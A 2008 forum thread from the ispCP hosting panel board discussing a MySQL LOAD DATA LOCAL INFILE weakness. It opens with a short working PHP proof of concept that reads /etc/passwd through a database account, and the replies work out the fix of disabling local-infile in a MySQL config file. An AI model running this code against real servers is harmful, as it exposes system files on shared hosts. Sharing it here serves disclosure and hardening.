+- ispCP - Board - Support (http://www.isp-control.net/forum)
+-- Forum: ispCP Omega Development Area (/forum-1.html)
+--- Forum: General discussion (/forum-11.html)
+--- Thread: exploit (/thread-3772.html)
exploit - sci2tech - 07-16-2008 09:06 PM
Well known, old, not generated by ispcp but affect it.
Code:
<?php
$link = mysql_connect('localhost', 'sqluser1', 'sqluser1');
mysql_select_db('bla');
mysql_query("CREATE TABLE a (a varchar(1024))");
mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a");
$result = mysql_query("SELECT a FROM a");
while(list($row) = mysql_fetch_row($result))
print "$row\n";
mysql_query("DROP TABLE `a`");
?>Quote:set-variable=local-infile=0Maybe this should be implement as a security feature in ispcp
RE: exploit - aseques - 07-22-2008 12:19 AM
The issue it's quite grave, even tought you can not get /etc/shadow, you can get lots of sensitive information if mysql is not chrootted (in ispcp it isn't)
In the case of Plesk, they set the value to 0 too.
RE: exploit - ephigenie - 07-22-2008 12:23 AM
mh.
yeah we'll see that we test if the value is present and if not append it in the [mysqld] section. lets see how we can do that.
But after all it should be clear that this kind of information gathering is only possible if the attackers has a valid mysql account - or has found a method to inject malicious code into installed php applications (i.e. phpbb 2.x and so on are good candidates for such things )
RE: exploit - aseques - 07-22-2008 12:29 AM
In /etc/mysql/my.cnf, you can read
Code:
....................
#
# * IMPORTANT: Additional settings that can override those from this file!
#
!includedir /etc/mysql/conf.d/So, you could probably create an /etc/mysql/conf.d/ispcp with the customized settings...
RE: exploit - ephigenie - 07-22-2008 12:31 AM
yeah this is a good point ... (lets see how this works out)
RE: exploit - FeG - 07-24-2008 07:08 AM
Hi,
I'd suppose to create a file in /etc/mysql/conf.d named i.e. exploit-fix.cnf with the following content:
Code:
# Fixing http://www.isp-control.net/forum/exploit-t-3772.html
[mysqld]
set-variable=local-infile=0until this is fixed officially by an ispCP config file.
You'll have to restart mysql thereafter:
Code:
/etc/init.d/mysql restartGreetings
FeG